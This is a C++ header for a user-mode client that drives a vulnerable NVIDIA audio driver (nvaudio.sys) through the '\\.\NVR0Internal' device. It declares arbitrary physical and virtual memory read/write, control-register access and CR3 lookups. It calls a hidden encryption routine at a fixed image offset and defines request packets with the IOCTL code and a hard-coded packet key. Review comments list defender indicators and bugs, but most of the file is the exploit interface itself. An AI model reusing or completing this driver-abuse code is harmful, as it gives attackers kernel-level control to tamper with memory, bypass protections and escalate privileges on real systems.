#pragma once
#include <Windows.h>
#include <iostream>
#include <tlhelp32.h>
/// User-mode client for the `\\.\NVR0Internal` device object.
///
/// Judging by the declarations below, the driver behind that device services
/// requests for control-register access and physical-memory access on behalf
/// of a user-mode caller. Only the constructor and the two templates are
/// defined here; every other member function is a declaration whose
/// definition is not part of this header.
///
/// Review notes (defensive):
///  - Artifacts visible in this header that a defender can search for: the
///    device path `\\.\NVR0Internal`, the image path `C:\nvaudio.sys` being
///    loaded into a user process, and the control code 0x9C40A484.
///  - A driver interface of this shape hands kernel-level primitives to any
///    caller able to open the device; driver load policy and the device's
///    access control are the controls that matter, not this client code.
///  - No destructor is declared, so neither the module handle nor the device
///    handle is released by this type.
struct NVDrv
{
public:
    // Control-register accessors; `cr` presumably takes an NVControlRegisters
    // value — confirm against the definitions.
    DWORD ReadCr(int cr);
    BOOL WriteCr(int cr, DWORD64 value);

    // Process lookup helpers keyed by executable name.
    std::wstring GetProcessPath(const std::wstring& processName);
    uintptr_t GetProcessBase(const std::wstring& processName);

    // Page-table root lookups and address translation (definitions elsewhere).
    uintptr_t GetProcessCR3(uintptr_t base_address);
    uintptr_t GetSystemCR3();
    uintptr_t MmGetPhysicalAddress(uintptr_t virtual_address);
    uintptr_t TranslateLinearToPhysicalAddress(uintptr_t virtual_address);

    // Raw memory transfer by physical or virtual address.
    // NOTE(review): `size` is a signed int on the physical variants and an
    // unsigned long on the virtual ones; nothing in this header bounds it.
    BOOL ReadPhysicalMemory(uintptr_t physical_address, void* OUT res, int size);
    BOOL WritePhysicalMemory(uintptr_t physical_address, void* IN res, int size);
    BOOL ReadVirtualMemory(uintptr_t address, LPVOID output, unsigned long size);
    BOOL WriteVirtualMemory(uintptr_t address, LPVOID data, unsigned long size);

    // Presumably stores the page-table root used by the virtual-memory
    // helpers (see `target_cr3` below) — confirm against the definition.
    BOOL SwapReadContext(uintptr_t target_cr3);

    /// Maps `C:\nvaudio.sys` into the calling process and opens the device.
    ///
    /// Terminates the process with exit code 5000 when either step fails.
    NVDrv()
    {
        const HMODULE driver_image = LoadLibraryW(L"C:\\nvaudio.sys");
        if (driver_image == nullptr)
        {
            printf("nvaudio.sys not found at C: directory!\n");
            exit(5000);
        }

        // The routine is located by a fixed offset from the image base.
        // NOTE(review): nothing here checks that the file on disk is the
        // build this offset was taken from; with any other image the pointer
        // is meaningless and calling through it is undefined.
        encrypt_payload = (decltype(encrypt_payload))(__int64(driver_image) + 0x2130);

        nvhandle = CreateFileW(L"\\\\.\\NVR0Internal", GENERIC_READ | GENERIC_WRITE, NULL, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_HIDDEN, NULL);
        if (nvhandle == INVALID_HANDLE_VALUE)
        {
            printf("Driver is not loaded!\n");
            exit(5000);
        }

        printf("NVR0Internal Handle: %p\n", nvhandle);
    }

    /// Reads one `T` through ReadVirtualMemory.
    ///
    /// @return the value read, or `NULL` converted to `T` on failure.
    /// NOTE(review): the failure path only compiles for a `T` that can be
    /// built from `NULL`, and a failed read is indistinguishable from a
    /// stored zero.
    template<typename T>
    T Read(uintptr_t address)
    {
        T buffer;
        const BOOL ok = ReadVirtualMemory(address, &buffer, sizeof(T));
        if (ok)
            return buffer;
        return NULL;
    }

    /// Writes one `T` through WriteVirtualMemory.
    ///
    /// @return TRUE on success, FALSE otherwise.
    template<typename T>
    BOOL Write(uintptr_t address, T val)
    {
        return WriteVirtualMemory(address, (LPVOID)&val, sizeof(T)) ? TRUE : FALSE;
    }

    // Register numbers accepted by ReadCr / WriteCr.
    enum NVControlRegisters {
        CR0 = 0,
        CR2 = 2,
        CR3 = 3,
        CR4 = 4
    };

private:
    // NOTE(review): a macro defined inside the struct is still visible to
    // every translation unit that includes this header.
#define DEBUG TRUE

    // Control code carried by the requests; the DeviceIoControl call itself
    // is not in this header.
    // NOTE(review): the literal does not fit in a signed int, so the stored
    // value is negative.
    static constexpr int ioctl_code = 0x9C40A484;

    // Operation selector placed in the first field of every request packet.
    enum class NVFunction : int
    {
        read_cr = 0,
        write_cr = 1,
        phys_read = 0x14,
        phys_write = 0x15,
        phys_req = 0x26
    };

    // Empty common base so encrypt_payload can take any packet type.
    struct request { };

    // Packet layout shared by all request_* types: 56 bytes of operation
    // fields, a 0x40-byte packet_key, then padding up to 0x138 bytes total
    // (assuming the empty base adds no size and default alignment — TODO
    // confirm with a static_assert on sizeof).

    // Physical memory copy request.
    struct request_memcpy : request
    {
        NVFunction request_id;
        int size;
        __int64 dst_addr;
        __int64 src_addr;
        char unk[0x20];
        unsigned __int64 packet_key[0x40 / 8];
        char unk_data[0x138 - 0x40 - 56];
    };

    // Virtual-to-physical address query.
    struct request_phys_addr : request
    {
        NVFunction request_id;
        int unk_0;
        __int64 result_addr;
        __int64 virtual_addr;
        int writevalue;
        char unk[0x20 - 4];
        unsigned __int64 packet_key[0x40 / 8];
        char unk_data[0x138 - 0x40 - 56];
    };

    // Control-register read request. This is the only packet type whose
    // packet_key has a default initialiser; the others leave it unset here.
    struct request_readcr : request
    {
        NVFunction request_id;
        int unk_0;
        int cr_num;
        int unk10;
        int unk14;
        int unk18;
        int result;
        char unk[0x20 - 4];
        unsigned __int64 packet_key[0x40 / 8] = {
            12868886329971960498,
            13552922889676271240,
            10838534925730813900,
            11819403095038824665,
            16047435637536096,
            10679697536739367056,
            18271467892729589711,
            6472933704646412218
        };
        char unk_data[0x138 - 0x40 - 56];
    };

    // Control-register write request.
    // NOTE(review): `writevalue` is an int while WriteCr takes a DWORD64.
    struct request_writecr : request
    {
        NVFunction request_id;
        int unk_0;
        int cr_num;
        int unk10;
        int unk14;
        int unk18;
        int writevalue;
        char unk[0x20 - 4];
        unsigned __int64 packet_key[0x40 / 8];
        char unk_data[0x138 - 0x40 - 56];
    };

    // Set by the constructor to image base + 0x2130; by its name it prepares
    // a packet before it is sent — confirm against the call sites.
    void* (*encrypt_payload)(request* data_crypt, int, void* temp_buf) = nullptr;

    // Handle to \\.\NVR0Internal, opened by the constructor.
    HANDLE nvhandle = INVALID_HANDLE_VALUE;

    // Page-table root for the current target; presumably updated by
    // SwapReadContext.
    uintptr_t target_cr3 = 0;
};